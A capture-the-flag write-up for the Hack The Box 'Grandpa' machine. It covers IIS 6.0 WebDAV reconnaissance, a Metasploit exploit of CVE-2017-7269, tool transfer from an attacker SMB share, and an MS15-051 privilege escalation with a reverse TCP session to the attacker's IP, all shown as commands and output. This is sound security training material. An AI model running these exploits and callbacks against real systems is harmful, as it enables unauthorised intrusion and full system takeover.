Contents

🕵 HTB-Writeup : GRANDPA

Recon

nmap

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
nmap -A -sV -Pn -T5 10.10.10.14

PORT   STATE SERVICE VERSION
80/tcp open  http    Microsoft IIS httpd 6.0
| http-methods: 
|_  Potentially risky methods: TRACE COPY PROPFIND SEARCH LOCK UNLOCK DELETE PUT MOVE MKCOL PROPPATCH
|_http-server-header: Microsoft-IIS/6.0
|_http-title: Under Construction
| http-webdav-scan: 
|   Allowed Methods: OPTIONS, TRACE, GET, HEAD, COPY, PROPFIND, SEARCH, LOCK, UNLOCK
|   Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
|   WebDAV type: Unknown
|   Server Type: Microsoft-IIS/6.0
|_  Server Date: Sat, 30 Jul 2022 11:18:40 GMT
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

We are face of a IIS 6.0.0 webserver.

Vulnerabilities

Running Nikto we found some usefull informations. Many HTTP methods are allowed on the server. We found a /_vti_bin directory meaning that a SharePoint Service is up. We also see that WebDav is enabled on the server.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          10.10.10.14
+ Target Hostname:    10.10.10.14
+ Target Port:        80
+ Start Time:         2022-07-30 11:20:52 (GMT0)
---------------------------------------------------------------------------
+ Server: Microsoft-IIS/6.0
+ Retrieved microsoftofficewebserver header: 5.0_Pub
+ Retrieved x-powered-by header: ASP.NET
+ The anti-clickjacking X-Frame-Options header is not present.
+ Uncommon header 'microsoftofficewebserver' found, with contents: 5.0_Pub
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type.
+ Retrieved x-aspnet-version header: 1.1.4322
+ Retrieved dasl header: <DAV:sql>
+ Retrieved dav header: 1, 2
+ Retrieved ms-author-via header: MS-FP/4.0,DAV
+ Uncommon header 'ms-author-via' found, with contents: MS-FP/4.0,DAV
+ Allowed HTTP Methods: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH 
+ OSVDB-5646: HTTP method ('Allow' Header): 'DELETE' may allow clients to remove files on the web server.
+ OSVDB-397: HTTP method ('Allow' Header): 'PUT' method could allow clients to save files on the web server.
+ OSVDB-5647: HTTP method ('Allow' Header): 'MOVE' may allow clients to change file locations on the web server.
+ Public HTTP Methods: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH 
+ OSVDB-5646: HTTP method ('Public' Header): 'DELETE' may allow clients to remove files on the web server.
+ OSVDB-397: HTTP method ('Public' Header): 'PUT' method could allow clients to save files on the web server.
+ OSVDB-5647: HTTP method ('Public' Header): 'MOVE' may allow clients to change file locations on the web server.
+ WebDAV enabled (PROPPATCH COPY LOCK PROPFIND MKCOL UNLOCK SEARCH listed as allowed)
+ OSVDB-13431: PROPFIND HTTP verb may show the server's internal IP address: http://10.10.10.14/
+ OSVDB-396: /_vti_bin/shtml.exe: Attackers may be able to crash FrontPage by requesting a DOS device, like shtml.exe/aux.htm -- a DoS was not attempted.
+ OSVDB-3233: /postinfo.html: Microsoft FrontPage default file found.
+ OSVDB-3233: /_vti_bin/shtml.exe/_vti_rpc: FrontPage may be installed.
+ OSVDB-3233: /_vti_inf.html: FrontPage/SharePoint is installed and reveals its version number (check HTML source for more information).
+ OSVDB-3500: /_vti_bin/fpcount.exe: Frontpage counter CGI has been found. FP Server version 97 allows remote users to execute arbitrary system commands, though a vulnerability in this version could not be confirmed. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1376. http://www.securityfocus.com/bid/2252.
+ OSVDB-67: /_vti_bin/shtml.dll/_vti_rpc: The anonymous FrontPage user is revealed through a crafted POST.
+ /_vti_bin/_vti_adm/admin.dll: FrontPage/SharePoint file found.
+ /_vti_bin/_vti_adm/admin.exe: FrontPage/Sharepointfile available.
+ /_vti_bin/_vti_aut/author.exe: FrontPage/Sharepointfile available.
+ /_vti_bin/_vti_aut/author.dll: FrontPage/Sharepointfile available.
+ 26658 requests: 0 error(s) and 30 item(s) reported on remote host
+ End Time:           2022-07-30 11:38:15 (GMT0) (1043 seconds)
---------------------------------------------------------------------------

While searching on web we found an old vulnerability, a buffer overflow on fpcount.exe in IIS version 4.0.

Pushing a little bit further, I found a similar vulnerability on IIS 6.0.

According to a Trendmicro article:

“Microsoft Internet Information Services (IIS) 6.0 is vulnerable to a zero-day buffer overflow that lead to arbitrary code execution due to an improper validation of an ‘IF’ header in a PROPFIND request.”

The Nikto scan showed us all allowed HTTP Methods:

+ Allowed HTTP Methods: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH

The PROPFIND method is allowed! Let’s try the exploit of this vulnerability!

Exploit

We search on the Metasploit console if there are an exploit for this vulnerability. This zero-day have been attributed to this CVE: CVE-2017-7269

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
msf6 > search CVE-2017-7269

Matching Modules
================

   #  Name                                                 Disclosure Date  Rank    Check  Description
   -  ----                                                 ---------------  ----    -----  -----------
   0  exploit/windows/iis/iis_webdav_scstoragepathfromurl  2017-03-26       manual  Yes    Microsoft IIS WebDav ScStoragePathFromUrl Overflow

msf6 > use exploit/windows/iis/iis_webdav_scstoragepathfromurl

There is a Metasploit module for this CVE. We try to exploit:

1
2
3
4
5
# set all required options
msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > exploit

c:\windows\system32\inetsrv>whoami
nt authority\network service

We got a shell! We are connected into the server with nt authority\network service permissions. While traveling into directories we find users home, but we actually can’t list files, we don’t have permissions.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
 Directory of C:\Documents and Settings

04/12/2017  05:32 PM    <DIR>          .
04/12/2017  05:32 PM    <DIR>          ..
04/12/2017  05:12 PM    <DIR>          Administrator
04/12/2017  05:03 PM    <DIR>          All Users
04/12/2017  05:32 PM    <DIR>          Harry
               0 File(s)              0 bytes
               5 Dir(s)   1,290,956,800 bytes free

C:\Documents and Settings>cd Harry 
cd Harry
Access is denied.

Server Recon

I start by getting system informations, users and running process to try to find some entry point.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
c:\windows\system32\inetsrv> systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
OS Name:                   Microsoft(R) Windows(R) Server 2003, Standard Edition
OS Version:                5.2.3790 Service Pack 2 Build 3790
Hotfix(s):                 1 Hotfix(s) Installed.

C:\WINDOWS\system32\inetsrv>net user
User accounts for \\GRANPA
-------------------------------------------------------------------------------
Administrator            ASPNET                   Guest                    
Harry                    IUSR_GRANPA              IWAM_GRANPA  

# list process
Tasklist /SVC

I found some process started with the nt authority\network service.

Searching privesc vulnerabilities

Then, I try to pass WinPeas on the target to find some interesting thing. I use the .bat because the box only have 1Go of memory, binary like WinPeas.exe, Mimikatz can’t be run on the server. I got the error Program too big to fit in memory each time I try to run a program.

1
2
3
4
5
# create a smb share with impacket on host
impacket-smbserver coucou . -smb2support

# copy file into the target
copy \\10.10.16.8\coucou\WinPeas.bat c:\Windows\Temp\.

No result from WinPeas.

Then, I used the Windows-Exploit-Suggester that allow us to dress a list of potentials vulnerabilities of the system. The tool require the output of the systeminfo command.

1
2
3
4
# get mssb database
python2 windows-exploit-suggester.py --update
# run tool, provide systeminfo from the target on the -i option
python2 windows-exploit-suggester.py -i sysinfo.txt -d 2022-07-31-mssb.xls

It gave me a long list of vulnerabilities. After, some more research and tests I was unable to privesc.

Next, I manage to check privileges information of our user with the whoami /all command.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
whoami /all

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State   
============================= ========================================= ========
SeAuditPrivilege              Generate security audits                  Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled 
SeImpersonatePrivilege        Impersonate a client after authentication Enabled 
SeCreateGlobalPrivilege       Create global objects                     Enabled 

The SeImpersonatePrivilege privileg is enabled! We can try to impersonate to run command from other users.

I tried to Impersonate from (RottenPotato)[https://github.com/foxglovesec/RottenPotato] & (JuicyPotato)[https://github.com/ohpe/juicy-potato], then from (PrintSpoofer)[https://github.com/itm4n/PrintSpoofer] but…

drawing

like CJ says, again we got a memory error…

Last ressort, Metasploit

I background my meterpreter sessions, and then, search for exploit with the post/multi/recon/local_exploit_suggester which allows you to test multiple exploits and see if the target is potentially vulnerable.

1
2
3
4
5
6
7
8
9
msf6 > use post/multi/recon/local_exploit_suggester
msf6 post(multi/recon/local_exploit_suggester) > set session 2
msf6 post(multi/recon/local_exploit_suggester) > run
 1   exploit/windows/local/ms10_015_kitrap0d                        Yes                      The service is running, but could not be validated.
 2   exploit/windows/local/ms14_058_track_popup_menu                Yes                      The target appears to be vulnerable.
 3   exploit/windows/local/ms14_070_tcpip_ioctl                     Yes                      The target appears to be vulnerable.
 4   exploit/windows/local/ms15_051_client_copy_image               Yes                      The target appears to be vulnerable.
 5   exploit/windows/local/ms16_016_webdav                          Yes                      The service is running, but could not be validated.
 6   exploit/windows/local/ppr_flatten_rec                          Yes                      The target appears to be vulnerable.

The target appears to be vulnerable to several exploit! But none is currently working. This is because modules use meterpreter commands like getsid but we currently get an access denied when trying to get system informations from the meterpreter prompt:

1
2
meterpreter > getsid
[-] stdapi_sys_config_getsid: Operation failed: Access is denied.

After hours of hassle I found that it is possible to migrate from process to process to execute meterpreter commands. We spawn on a process that didn’t have enough privileges. That’s why all our exploit were not working. To do so, we start by identifying processes owned by the nt authority\network service.

1
2
3
4
meterpreter > ps
 1968  584   wmiprvse.exe       x86   0        NT AUTHORITY\NETWORK SERVICE  C:\WINDOWS\system32\wbem\wmiprvse.exe
 2160  1492  w3wp.exe           x86   0        NT AUTHORITY\NETWORK SERVICE  c:\windows\system32\inetsrv\w3wp.exe
 2228  584   davcdata.exe       x86   0        NT AUTHORITY\NETWORK SERVICE  C:\WINDOWS\system32\inetsrv\davcdata.exe

I take PID of another random process, here pid:1968 (pid of the wmiprvse.exe process) and switch our session to it by passing it to the migrate command in meterpreter.

1
2
3
4
5
6
meterpreter > migrate 1968
[*] Migrating from 2276 to 1968...
[*] Migration completed successfully.

meterpreter > getuid
Server username: NT AUTHORITY\NETWORK SERVICE

It works! We can now use meterpreter command to get system informations. Then, I re-tried one of the modules I found earlier.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
msf6 exploit(windows/local/ms15_051_client_copy_image) > run

[*] Started reverse TCP handler on 10.10.16.8:4445 
[*] Reflectively injecting the exploit DLL and executing it...
[*] Launching netsh to host the DLL...
[+] Process 3312 launched.
[*] Reflectively injecting the DLL into 3312...
[*] Sending stage (175686 bytes) to 10.10.10.14
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Meterpreter session 4 opened (10.10.16.8:4445 -> 10.10.10.14:1031) at 2022-08-01 01:48:21 +0200

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

C:\Documents and Settings\Harry\Desktop>type user.txt
type user.txt
*************************6a5d869

C:\Documents and Settings\Administrator\Desktop>type root.txt
type root.txt
*************************f28bb7b

One of the exploits works! We got a system authority shell ! We can now take both flag.

Tags

Easy, External, IIS, ASP, Penetration Tester Level 2, Unrestricted File Upload, CVE-2017-7269, Enumeration, WebDav, Misconfiguration, Public Vulnerabilities, CVE Exploitation